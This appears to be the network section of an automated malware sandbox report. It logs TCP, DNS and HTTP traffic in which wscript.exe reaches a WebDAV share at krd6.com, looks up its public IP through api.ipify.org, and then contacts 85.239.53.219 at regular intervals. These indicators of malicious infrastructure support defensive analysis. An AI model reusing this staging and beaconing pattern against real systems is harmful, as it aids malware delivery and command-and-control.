                                                                  Apr 17, 2024 16:51:41.686309099 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686316967 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686326981 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686336040 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686343908 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686351061 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686361074 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686369896 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686378002 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686388016 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686393976 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686403036 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686424971 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686433077 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686444044 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686453104 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686460972 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686467886 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686481953 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686486006 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686496019 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:41.686516047 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686547995 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686577082 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.686681032 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.689052105 CEST4972280192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.851584911 CEST4972380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:41.929532051 CEST804972287.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.098253012 CEST804972387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.098366976 CEST4972380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:42.098539114 CEST4972380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:42.386296034 CEST804972387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.457077980 CEST804972387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.457119942 CEST804972387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.457169056 CEST4972380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:42.457247972 CEST4972380192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:42.461168051 CEST4972480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:42.703685999 CEST804972387.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.707859993 CEST804972487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:42.708085060 CEST4972480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:42.708201885 CEST4972480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:43.000392914 CEST804972487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:43.065470934 CEST804972487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:43.065546989 CEST4972480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:43.065664053 CEST4972480192.168.2.687.249.49.206
                                                                  Apr 17, 2024 16:51:43.313808918 CEST804972487.249.49.206192.168.2.6
                                                                  Apr 17, 2024 16:51:46.462179899 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.462253094 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:46.462436914 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.465460062 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.465490103 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:46.697567940 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:46.697649002 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.700287104 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.700309038 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:46.700642109 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:46.744282961 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.761651039 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:46.808125019 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:47.001574993 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:47.001729012 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:47.001797915 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:47.005794048 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:47.005852938 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:47.005891085 CEST49726443192.168.2.6104.26.13.205
                                                                  Apr 17, 2024 16:51:47.005908966 CEST44349726104.26.13.205192.168.2.6
                                                                  Apr 17, 2024 16:51:58.018424034 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:51:58.182883024 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:51:58.182979107 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:51:58.183089972 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:51:58.183113098 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:51:58.347347021 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:51:58.347368002 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:51:58.377193928 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:51:58.379358053 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:51:58.559297085 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:51:58.608020067 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:52:18.562695026 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:52:18.741005898 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:52:18.794399977 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:52:38.772017956 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:52:38.950999975 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:52:38.991488934 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:52:58.954709053 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:52:59.134916067 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:52:59.186084032 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:53:19.138189077 CEST4973380192.168.2.685.239.53.219
                                                                  Apr 17, 2024 16:53:19.317894936 CEST804973385.239.53.219192.168.2.6
                                                                  Apr 17, 2024 16:53:19.370178938 CEST4973380192.168.2.685.239.53.219

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 17, 2024 16:51:31.002007008 CEST5945153192.168.2.61.1.1.1
                                                                  Apr 17, 2024 16:51:31.146373034 CEST53594511.1.1.1192.168.2.6
                                                                  Apr 17, 2024 16:51:46.353379965 CEST5960453192.168.2.61.1.1.1
                                                                  Apr 17, 2024 16:51:46.458060026 CEST53596041.1.1.1192.168.2.6

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Apr 17, 2024 16:51:31.002007008 CEST192.168.2.61.1.1.10x9380Standard query (0)krd6.comA (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:46.353379965 CEST192.168.2.61.1.1.10xfcbfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Apr 17, 2024 16:51:30.121181011 CEST1.1.1.1192.168.2.60xe182No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:30.121181011 CEST1.1.1.1192.168.2.60xe182No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:31.146373034 CEST1.1.1.1192.168.2.60x9380No error (0)krd6.com87.249.49.206A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:46.458060026 CEST1.1.1.1192.168.2.60xfcbfNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:46.458060026 CEST1.1.1.1192.168.2.60xfcbfNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:46.458060026 CEST1.1.1.1192.168.2.60xfcbfNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:48.472697973 CEST1.1.1.1192.168.2.60xa238No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:51:48.472697973 CEST1.1.1.1192.168.2.60xa238No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:52:00.714283943 CEST1.1.1.1192.168.2.60x6707No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:52:00.714283943 CEST1.1.1.1192.168.2.60x6707No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:52:49.141230106 CEST1.1.1.1192.168.2.60xef18No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Apr 17, 2024 16:52:49.141230106 CEST1.1.1.1192.168.2.60xef18No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • api.ipify.org
                                                                  • krd6.com
                                                                  • *
                                                                    • 85.239.53.219

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.64971287.249.49.206806916C:\Windows\System32\wscript.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:31.395070076 CEST97OUTOPTIONS / HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  User-Agent: DavClnt
                                                                  translate: f
                                                                  Host: krd6.com
                                                                  Apr 17, 2024 16:51:31.756604910 CEST299INHTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 0
                                                                  DAV: 1,2
                                                                  Date: Wed, 17 Apr 2024 14:51:31 GMT
                                                                  Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
                                                                  MS-Author-Via: DAV
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.64971387.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:35.664994001 CEST132OUTOPTIONS /share HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                                                                  translate: f
                                                                  Host: krd6.com
                                                                  Apr 17, 2024 16:51:36.025803089 CEST299INHTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 0
                                                                  DAV: 1,2
                                                                  Date: Wed, 17 Apr 2024 14:51:35 GMT
                                                                  Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
                                                                  MS-Author-Via: DAV
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.64971487.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:36.431360960 CEST162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e
                                                                  Data Ascii: PROPFIND /share HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:36.784861088 CEST1088INHTTP/1.1 207 Multi-Status
                                                                  Content-Type: application/xml; charset=utf-8
                                                                  Date: Wed, 17 Apr 2024 14:51:36 GMT
                                                                  Content-Length: 883
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0a 3c 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 44 41 56 3a 22 3e 3c 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 6e 73 30 3a 68 72 65 66 3e 2f 73 68 61 72 65 2f 3c 2f 6e 73 30 3a 68 72 65 66 3e 3c 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 2f 3e 3c 2f 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 30 34 2d 31 36 54 31 36 3a 33 35 3a 35 38 5a 3c 2f 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 34 36 36 31 39 31 35 36 34 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 32 30 33 31 39 33 36 37 31 36 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 36 20 41 70 72 20 32 30 32 34 20 31 36 3a 33 35 3a 35 38 20 47 4d 54 3c 2f 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 73 68 61 72 65 3c 2f 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 64 69 73 63 6f 76 65 72 79 20 2f 3e 3c 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 65 78 63 6c 75 73 69 76 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 73 68 61 72 65 64 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 6e 73 30 3a 73 74 61 74 75 73 3e 3c 2f 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><ns0:multistatus xmlns:ns0="DAV:"><ns0:response><ns0:href>/share/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2024-04-16T16:35:58Z</ns0:creationdate><ns0:quota-used-bytes>4661915648</ns0:quota-used-bytes><ns0:quota-available-bytes>20319367168</ns0:quota-available-bytes><ns0:getlastmodified>Tue, 16 Apr 2024 16:35:58 GMT</ns0:getlastmodified><ns0:displayname>share</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.64971687.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:37.061486959 CEST162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e
                                                                  Data Ascii: PROPFIND /share HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:37.421343088 CEST1088INHTTP/1.1 207 Multi-Status
                                                                  Content-Type: application/xml; charset=utf-8
                                                                  Date: Wed, 17 Apr 2024 14:51:37 GMT
                                                                  Content-Length: 883
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0a 3c 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 44 41 56 3a 22 3e 3c 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 6e 73 30 3a 68 72 65 66 3e 2f 73 68 61 72 65 2f 3c 2f 6e 73 30 3a 68 72 65 66 3e 3c 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 2f 3e 3c 2f 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 30 34 2d 31 36 54 31 36 3a 33 35 3a 35 38 5a 3c 2f 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 34 36 36 31 39 31 35 36 34 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 32 30 33 31 39 33 36 37 31 36 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 36 20 41 70 72 20 32 30 32 34 20 31 36 3a 33 35 3a 35 38 20 47 4d 54 3c 2f 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 73 68 61 72 65 3c 2f 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 64 69 73 63 6f 76 65 72 79 20 2f 3e 3c 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 65 78 63 6c 75 73 69 76 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 73 68 61 72 65 64 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 6e 73 30 3a 73 74 61 74 75 73 3e 3c 2f 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><ns0:multistatus xmlns:ns0="DAV:"><ns0:response><ns0:href>/share/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2024-04-16T16:35:58Z</ns0:creationdate><ns0:quota-used-bytes>4661915648</ns0:quota-used-bytes><ns0:quota-available-bytes>20319367168</ns0:quota-available-bytes><ns0:getlastmodified>Tue, 16 Apr 2024 16:35:58 GMT</ns0:getlastmodified><ns0:displayname>share</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.64971887.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:37.692135096 CEST192OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 36 34 5f 36 39 31 36 2e 61 6d 73 69 2e 63 73 76 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73
                                                                  Data Ascii: PROPFIND /share/syscalls/amsi64_6916.amsi.csv HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:38.048165083 CEST606INHTTP/1.1 404 Not Found
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 410
                                                                  Date: Wed, 17 Apr 2024 14:51:37 GMT
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 73 79 73 63 61 6c 6c 73 2f 61 6d 73 69 36 34 5f 36 39 31 36 2e 61 6d 73 69 2e 63 73 76 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 73 67 69 64 61 76 2f 27 3e 57 73 67 69 44 41 56 2f 34 2e 33 2e 30 3c 2f 61 3e 20 2d 20 32 30 32 34 2d 30 34 2d 31 37 20 31 36 3a 35 31 3a 33 37 2e 39 30 34 32 37 33 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /syscalls/amsi64_6916.amsi.csv</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2024-04-17 16:51:37.904273</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.64971787.249.49.20680
                                                                  TimestampBytes transferredDirectionData
